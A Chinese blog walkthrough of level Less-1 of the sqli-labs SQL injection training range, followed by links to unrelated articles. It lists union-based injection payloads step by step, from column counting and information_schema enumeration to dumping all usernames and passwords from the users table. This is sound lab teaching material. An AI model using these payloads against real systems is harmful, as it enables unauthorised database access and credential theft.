当前位置: 首页 > article >正文

sql注入——靶场Less1

article 2024/11/4 16:54:43

?id=1

?id=99'union select 1,2,3--+
查看占位

?id=1' order by 3--+

尝试出表有几列

 ?id=1' order by 4--+

说明只有三列

?id=99' union select 1,database(),3--+

查询当前使用的数据库的名称

?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+

查询security表中有哪些表

?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

查询users表中有哪些信息

?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+

展示所有users表中的信息


http://www.kler.cn/a/378952.html

相关文章:

  • PKG_CHECK_MODULES(FUSE,fuse)
  • Spring Boot 配置文件启动加载顺序
  • github - ssh 配置 key、下载repo
  • 【论文阅读笔记】Wavelet Convolutions for Large Receptive Fields
  • 使用NCNN在树莓派部署深度学习模型流程
  • vue-i18n国际化多国语言i18n国际语言代码对照表
  • 请以鸿蒙生态崛起,开发者有哪些机遇与挑战
  • 探索PickleDB:Python中的轻量级数据存储利器
  • Rust 力扣 - 1984. 学生分数的最小差值
  • 国标GB28181软件EasyGBS国标GB28181网页直播平台在邮政快递场景中的应用
  • Web应用性能测试工具 - httpstat
  • Centos环境下安装docker
  • 红帽9—使用yum源部署docker
  • 做接口自动化遇到的20个难点,记录下我是如何解决的!
  • 什么是RabbitMQ
  • linux的文件IO操作---read函数如何退出
  • 使用Mac如何才能提高OCR与翻译的效率
  • SpringBoot技术栈:在线试题库系统深度开发
  • ElastricSearch 原理以及简单实用(超级通俗)
  • 5、reactive
  • 【保姆级教程】实操 Linux 磁盘管理:硬盘选型 分区挂载
  • el-table滚动下拉数据显示不全
  • web安全测试渗透案例知识点总结(上)——小白入狱
  • 国家级汽车检测中心联合开源网安打造安全解决方案,提升行业安全检测水平
  • Android 蓝牙各版本差异
  • python 获取鼠标点击的实时位置案例